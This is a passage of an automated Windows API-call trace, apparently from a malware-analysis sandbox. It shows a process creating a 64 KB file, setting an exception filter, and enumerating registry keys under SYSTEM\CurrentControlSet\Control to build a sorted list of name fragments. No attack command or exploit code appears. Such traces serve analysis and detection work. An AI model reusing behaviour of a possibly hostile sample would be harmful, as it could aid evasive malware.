dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0029.106] SetFilePointer (in: hFile=0x94, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0029.106] SetEndOfFile (hFile=0x94) returned 1 [0029.106] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1001af6) returned 0x0 [0029.106] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0x98) returned 0x0 [0029.106] RegEnumKeyW (in: hKey=0x98, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0029.106] lstrlenW (lpString="ACPI") returned 4 [0029.106] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x2794f0 [0029.106] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0029.106] lstrlenW (lpString="AGP") returned 3 [0029.106] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279510 [0029.106] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0029.106] lstrlenW (lpString="AppID") returned 5 [0029.107] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279530 [0029.107] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0029.108] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279b60 [0029.108] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0029.108] lstrlenW (lpString="Arbiters") returned 8 [0029.108] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x274158 [0029.108] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0029.108] lstrlenW (lpString="BackupRestore") returned 13 [0029.108] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x274180 [0029.108] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x2741a8 [0029.108] RegEnumKeyW (in: hKey=0x98, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0029.108] lstrlenW (lpString="Class") returned 5 [0029.108] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279b80 [0029.108] RegEnumKeyW (in: hKey=0x98, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0029.109] lstrlenW (lpString="CMF") returned 3 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279ba0 [0029.109] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0029.109] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0029.109] RegEnumKeyW (in: hKey=0x98, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0029.109] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279bc0 [0029.109] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x2741d0 [0029.109] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x279be0 [0029.109] RegEnumKeyW (in: hKey=0x98, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0029.109] lstrlenW (lpString="COM Name Arbiter") returned 16 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279c10 [0029.109] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0029.109] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0029.109] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279c30 [0029.109] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x2741f8 [0029.109] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0029.109] RegEnumKeyW (in: hKey=0x98, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0029.109] lstrlenW (lpString="ComputerName") returned 12 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x274220 [0029.109] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0029.109] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279c50 [0029.109] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0029.109] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0029.109] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279c50 | out: hHeap=0x260000) returned 1 [0029.110] RegEnumKeyW (in: hKey=0x98, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0029.110] lstrlenW (lpString="ContentIndex") returned 12 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x274248 [0029.110] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0029.110] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279c50 [0029.110] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0029.110] RegEnumKeyW (in: hKey=0x98, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0029.110] lstrlenW (lpString="CrashControl") returned 12 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279c70 [0029.110] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0029.110] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x274270 [0029.110] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0029.110] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0029.110] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0029.110] RegEnumKeyW (in: hKey=0x98, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0029.110] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x274298 [0029.110] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0029.110] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x2742c0 [0029.110] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0029.110] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0029.110] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2742c0 | out: hHeap=0x260000) returned 1 [0029.110] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x2742c0 [0029.110] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0029.110] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0029.110] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0029.110] RegEnumKeyW (in: hKey=0x98, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0029.111] lstrlenW (lpString="Cryptography") returned 12 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x26) returned 0x279c90 [0029.111] RegEnumKeyW (in: hKey=0x98, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0029.111] lstrlenW (lpString="DeviceClasses") returned 13 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x2742e8 [0029.111] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0029.111] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0029.111] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2742e8 | out: hHeap=0x260000) returned 1 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x2742e8 [0029.111] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0029.111] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0029.111] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0029.111] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0029.111] RegEnumKeyW (in: hKey=0x98, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0029.111] lstrlenW (lpString="DeviceOverrides") returned 15 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x274310 [0029.111] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0029.111] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0029.111] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274310 | out: hHeap=0x260000) returned 1 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x274310 [0029.111] RegEnumKeyW (in: hKey=0x98, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0029.111] lstrlenW (lpString="Diagnostics") returned 11 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x24) returned 0x279cc0 [0029.111] RegEnumKeyW (in: hKey=0x98, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0029.111] lstrlenW (lpString="Els") returned 3 [0029.111] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279d08 [0029.112] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0029.112] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0029.112] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0029.112] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0029.112] RegEnumKeyW (in: hKey=0x98, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0029.112] lstrlenW (lpString="Errata") returned 6 [0029.112] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x274338 [0029.112] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0029.112] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0029.112] RegEnumKeyW (in: hKey=0x98, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0029.112] lstrlenW (lpString="FileSystem") returned 10 [0029.112] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279d28 [0029.112] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0029.112] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0029.112] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x274360 [0029.112] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0029.112] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0029.112] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0029.113] RegEnumKeyW (in: hKey=0x98, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0029.113] lstrlenW (lpString="FileSystemUtilities") returned 19 [0029.113] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279d48 [0029.113] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0029.113] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0029.113] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0029.113] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279d48 | out: hHeap=0x260000) returned 1 [0029.113] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x274388 [0029.113] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0029.113] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0029.113] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0029.113] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0029.113] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274388 | out: hHeap=0x260000) returned 1 [0029.113] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x274388 [0029.113] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0029.113] RegEnumKeyW (in: hKey=0x98, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0029.113] lstrlenW (lpString="GraphicsDrivers") returned 15 [0029.113] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x2743b0 [0029.113] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0029.113] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0029.113] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0029.113] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0029.113] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x2743d8 [0029.113] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0029.113] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0029.113] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0029.113] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0029.113] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0029.113] RegEnumKeyW (in: hKey=0x98, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0029.113] lstrlenW (lpString="GroupOrderList") returned 14 [0029.113] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279d48 [0029.114] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0029.114] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0029.114] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0029.114] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279d68 [0029.114] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0029.114] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0029.114] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0029.114] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0029.114] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x279d88 [0029.114] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0029.114] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0029.114] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0029.114] RegEnumKeyW (in: hKey=0x98, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0029.114] lstrlenW (lpString="HAL") returned 3 [0029.114] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279da8 [0029.114] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0029.114] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0029.114] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0029.114] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0029.114] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0029.114] RegEnumKeyW (in: hKey=0x98, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0029.114] lstrlenW (lpString="IDConfigDB") returned 10 [0029.114] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x274400 [0029.114] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0029.114] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0029.114] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0029.114] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0029.114] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0029.114] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279dc8 [0029.114] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0029.114] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0029.114] RegEnumKeyW (in: hKey=0x98, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0029.115] lstrlenW (lpString="Keyboard Layout") returned 15 [0029.115] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x274428 [0029.115] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0029.115] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x274450 [0029.115] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0029.115] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0029.115] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0029.115] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0029.115] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0029.115] lstrlenW (lpString="Keyboard Layouts") returned 16 [0029.115] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x274478 [0029.115] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0029.115] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0029.115] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274478 | out: hHeap=0x260000) returned 1 [0029.115] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x274478 [0029.115] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0029.115] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0029.115] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0029.115] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0029.115] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0029.115] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0029.115] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0029.115] lstrlenW (lpString="Lsa") returned 3 [0029.116] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279de8 [0029.116] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0029.116] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0029.116] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0029.116] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279e08 [0029.116] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0029.116] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e08 | out: hHeap=0x260000) returned 1 [0029.116] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2744a0 [0029.116] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0029.116] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0029.116] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x2744c8 [0029.116] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0029.116] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0029.116] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0029.116] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0029.116] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0029.116] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0029.116] lstrlenW (lpString="LsaInformation") returned 14 [0029.116] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279e08 [0029.116] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0029.116] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0029.117] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0029.117] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0029.117] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0029.117] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0029.117] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0029.117] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e08 | out: hHeap=0x260000) returned 1 [0029.117] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x24) returned 0x27a4f0 [0029.117] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0029.117] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0029.117] lstrlenW (lpString="MediaCategories") returned 15 [0029.117] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e08 [0029.117] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0029.117] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27a520 [0029.117] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0029.117] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0029.117] lstrlenW (lpString="MediaDRM") returned 8 [0029.117] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e28 [0029.117] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0029.117] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0029.117] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0029.117] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e28 | out: hHeap=0x260000) returned 1 [0029.117] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x279e28 [0029.117] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0029.117] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0029.117] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0029.117] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0029.118] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0029.118] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0029.118] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0029.118] RegEnumKeyW (in: hKey=0x98, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0029.118] lstrlenW (lpString="MediaInterfaces") returned 15 [0029.118] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e48 [0029.118] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0029.118] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0029.118] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e48 | out: hHeap=0x260000) returned 1 [0029.118] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27a550 [0029.118] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0029.118] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0029.118] RegEnumKeyW (in: hKey=0x98, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0029.118] lstrlenW (lpString="MediaProperties") returned 15 [0029.118] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e48 [0029.118] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0029.118] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0029.118] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0029.118] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e48 | out: hHeap=0x260000) returned 1 [0029.118] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27a580 [0029.118] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0029.118] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0029.118] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0029.118] RegEnumKeyW (in: hKey=0x98, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0029.118] lstrlenW (lpString="MediaTypes") returned 10 [0029.118] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e48 [0029.119] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0029.119] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0029.119] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0029.119] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0029.119] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0029.119] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0029.119] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279e48 | out: hHeap=0x260000) returned 1 [0029.119] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x279e48 [0029.119] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0029.119] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0029.119] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0029.119] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0029.119] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0029.119] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0029.119] RegEnumKeyW (in: hKey=0x98, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0029.119] lstrlenW (lpString="MobilePC") returned 8 [0029.119] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x2744f0 [0029.119] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0029.119] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 